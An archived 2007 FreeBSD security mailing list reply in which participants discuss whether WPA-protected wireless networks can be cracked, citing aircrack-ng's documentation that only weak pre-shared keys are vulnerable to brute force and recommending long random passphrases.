Date: Tue, 20 Nov 2007 07:56:38 -0600 From: Josh Paetzel <josh@tcbug.org> To: freebsd-security@freebsd.org Cc: "Mark D. Foster" <mark@foster.cc> Subject: Re: testing wireless security Message-ID: <200711200756.42344.josh@tcbug.org> In-Reply-To: <4742225B.6020107@foster.cc> References: <200711191643.lAJGh3jb027972@lava.sentex.ca> <200711191321.44398.josh@tcbug.org> <4742225B.6020107@foster.cc>
next in thread | previous in thread | raw e-mail | index | archive | help
--nextPart13195010.E1FQb4yoQL Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Content-Disposition: inline On Monday 19 November 2007 05:55:07 pm Mark D. Foster wrote: > Josh Paetzel wrote: > > When I looked in to this it seemed that the current state of affairs is > > that WPA can only be broken by brute-forcing the key. I don't recall if > > that could be done 'off-line' or not. My memory is that the needed info > > to attempt bruteforcing could be done by simply receiving....no need to > > attempt to associate to the AP was needed. I'm not really interested = in > > disseminating links to tools that can be used to break wireless securit= y, > > but simple google searches will give you the info you need.....and the > > tools are in the ports tree for the most part. > > > > Fortunately WPA allows keys that put even resource-rich attackers in to > > the decade range to bruteforce. > > That would not appear to be a limitation of aircrack-ng > http://www.freshports.org/net-mgmt/aircrack-ng/ > > aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can > recover this keys once enough encrypted packets have been captured. > It implements the standard FMS attack along with some optimizations > like KoreK attacks, thus making the attack much faster compared to > other WEP cracking tools. In fact aircrack is a set of tools for > auditing wireless networks. > > That said, I haven't (yet) tried it myself ;) Well, if you were to read your own link for a bit you'd eventually find... http://www.aircrack-ng.org/doku.php?id=3Dcracking_wpa Quoting from the page.... WPA/WPA2 supports many types of authentication beyond pre-shared keys.=20 aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows= =20 the network as having the authentication type of PSK, otherwise, don't both= er=20 trying to crack it. There is another important difference between cracking WPA/WPA2 and WEP. Th= is=20 is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, wher= e=20 statistical methods can be used to speed up the cracking process, only plai= n=20 brute force techniques can be used against WPA/WPA2. That is, because the k= ey=20 is not static, so collecting IVs like when cracking WEP encryption, does no= t=20 speed up the attack. The only thing that does give the information to start= =20 an attack is the handshake between client and AP. Handshaking is done when= =20 the client connects to the network. Although not absolutely true, for the=20 purposes of this tutorial, consider it true. Since the pre-shared key can b= e=20 from 8 to 63 characters in length, it effectively becomes impossible to cra= ck=20 the pre-shared key. The only time you can crack the pre-shared key is if it is a dictionary wor= d=20 or relatively short in length. Conversely, if you want to have an unbreakab= le=20 wireless network at home, use WPA/WPA2 and a 63 character password composed= =20 of random characters including special symbols. =2D-=20 Thanks, Josh Paetzel PGP: 8A48 EF36 5E9F 4EDA 5A8C 11B4 26F9 01F1 27AF AECB --nextPart13195010.E1FQb4yoQL Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.4 (FreeBSD) iD8DBQBHQueaJvkB8SevrssRAkHVAKCZUK3FVIoZOgmQUSvgC/XA/jgL9wCgkkuL Q3gFjNU5UNSH9bIRiys9Cfo= =arkb -----END PGP SIGNATURE----- --nextPart13195010.E1FQb4yoQL--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200711200756.42344.josh>